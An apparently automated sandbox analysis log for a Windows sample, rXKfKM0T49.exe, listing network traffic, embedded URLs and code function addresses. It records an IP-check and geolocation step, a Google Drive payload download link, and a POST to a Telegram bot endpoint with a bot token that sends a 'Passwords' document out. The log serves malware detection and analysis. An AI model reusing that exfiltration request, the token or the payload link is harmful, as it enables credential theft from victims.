            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3199e441f6dbHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003592A000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndn
            Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035761000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003592A000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: rXKfKM0T49.exe, 00000003.00000003.2543321683.000000003795A000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035761000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.2543443551.000000003796F000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.2543377009.0000000037966000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2652880630.0000000037970000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2652751843.000000003793F000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.2543260103.0000000037946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: rXKfKM0T49.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
            Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000358FF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003583C000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035827000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003592A000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065
            Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgL
            Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: rXKfKM0T49.exe, 00000003.00000002.2628850496.0000000005200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: rXKfKM0T49.exe, 00000003.00000002.2629258002.0000000006CA0000.00000004.00001000.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2628850496.0000000005243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh
            Source: rXKfKM0T49.exe, 00000003.00000002.2628850496.0000000005243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYhy
            Source: rXKfKM0T49.exe, 00000003.00000003.1959880913.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2628850496.000000000527B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: rXKfKM0T49.exe, 00000003.00000003.1959880913.0000000005282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/#&
            Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1959880913.0000000005282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=download
            Source: rXKfKM0T49.exe, 00000003.00000003.1959880913.0000000005282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=download?
            Source: rXKfKM0T49.exe, 00000003.00000002.2628850496.0000000005243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=downloadf
            Source: rXKfKM0T49.exe, 00000003.00000002.2628850496.0000000005243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=downloadh
            Source: rXKfKM0T49.exe, 00000003.00000003.1959880913.0000000005282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=downloadid
            Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189ec
            Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: rXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
            Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
            Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.9:49972 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.9:49974 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49977 version: TLS 1.2
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034A5
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_00404DCC0_2_00404DCC
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_00406AF20_2_00406AF2
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_70091B5F0_2_70091B5F
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_00404DCC3_2_00404DCC
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_00406AF23_2_00406AF2
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_001560E03_2_001560E0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_001543283_2_00154328
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_001566B83_2_001566B8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_00158DA03_2_00158DA0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_00152DD13_2_00152DD1
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378AC6383_2_378AC638
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378ACCA03_2_378ACCA0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378A03C43_2_378A03C4
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378A33183_2_378A3318
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378A21303_2_378A2130
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378A78483_2_378A7848
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378AE79F3_2_378AE79F
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378A6E913_2_378A6E91
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378A6EA03_2_378A6EA0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378ADEE13_2_378ADEE1
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378ABD9C3_2_378ABD9C
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378ACCA23_2_378ACCA2
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378AB4EC3_2_378AB4EC
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378AEBF23_2_378AEBF2
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378AE3473_2_378AE347
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378ADA893_2_378ADA89
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378AAAE83_2_378AAAE8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378AC1F23_2_378AC1F2
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378AB9303_2_378AB930
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378AF0543_2_378AF054
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_378AB07F3_2_378AB07F
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384EB8963_2_384EB896
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384EA9B03_2_384EA9B0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384EA3603_2_384EA360
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E9D103_2_384E9D10
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384EBDF03_2_384EBDF0
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E86503_2_384E8650
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E96C83_2_384E96C8
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_384E67C03_2_384E67C0
